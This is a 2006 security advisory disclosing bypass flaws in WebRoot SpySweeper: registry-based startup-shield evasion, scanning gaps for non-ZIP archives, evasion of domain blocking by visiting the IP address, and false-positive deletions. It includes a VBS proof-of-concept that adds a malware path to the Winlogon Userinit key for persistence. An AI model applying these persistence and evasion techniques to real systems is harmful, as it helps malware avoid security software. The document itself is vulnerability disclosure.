<<< Date Index >>>     <<< Thread Index >>>

Multiple Bypass and Integrity Lost Vulnerabilities



                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@xxxxxxxxxxx


General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/06/20
Advisory ID : SGA-0001
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Software Product Name : SpySweeper
Product Version : All to 4.5.9 Build 709
Product Vendor : WebRoot (http://www.webroot.com)
Flawed File Name : spysweeper.exe
File Version : All to 4.5.9 Build 709
Default Local Path of the File : C:\Program Files\Webroot\Spysweeper\
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Design Flaw
Operating Systems : All Microsoft Windows
Vulnerability Impact : Bypass Security Measures
Vulnerability Rating : Critical
Patch Status : Unpatched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/05/30
Patch Date : None
Vulnerability Credit : Emmanouil Gavriil (egavriil@xxxxxxxxxxx)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

WebRoot SpySweeper is an application that provides various security measures
for your computer. Some of these measures can be easily bypassed. The bypass
methods can be used by malware in order to avoid security measures provided by
SpySweeper.


Technical Information
---------------------

The following vulnerabilities have been addressed to WebRoot SpySweeper:

1) Bypassing Startup-Shield. Modifications to Registry Keys could avoid the
   Security Measures provided by the Startup Shield.

2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in
   compressed files, but it seems that it only detects malware in files
   compressed with the ZIP compression.

3) Bypassing Spy Communication Shield. Spy Communication Shield seems to check
   only the domain name to be visited. Instead, if the site is visited by it's
   IP address, Spy Communication Shield does not block it.

4) Integrity lost due to wrong detection of files.


Proof of Concept Experiment
---------------------------

1) The following Registry Keys can be used to bypass the startup shield:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Userinit
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
  HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
  HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components\KeyName

  You can use the following script to prove the vulnerability (save the
  following code as .vbs):
  ****************************************************************************
  Dim WshShell

  Set WshShell = WScript.CreateObject("WScript.Shell")

  WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"
  WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, 
C:\malware.exe", "REG_SZ"
  WScript. Echo "There is an entry at: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Userinit with Value 
'C:\WINDOWS\system32\userinit.exe, C:\malware.exe' After the execution of 
userinit.exe, malware.exe could be run!"
  ****************************************************************************

2) Compressed file scanning can be bypassed by compressing to one of the
   following formats:
     RAR, GZ, TAR, CAB, ACE
 
3) Spy Communication Shield Bypass Proof of Concept:
   banners.pennyweb.com should be blocked.
   63.208.235.96 is not blocked.
 
4) 90.dl and or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
   SpySweeper tends to remove those files. Such a removal action could destroy
   an arriscad database. Furthermore is quite interesting why even an empty
   file with the name 90.dl or ieonflow.dll can be considered adware or
   spyware. Additionally the renaming of some malware files (ex. ieonflow.dll)
   avoids the detection as malware from the SpySweeper.


Patch Description and Information
---------------------------------

Vendor informed. No reply yet. No patch released yet.


References and Other Resources for Information
----------------------------------------------

None.

EOF.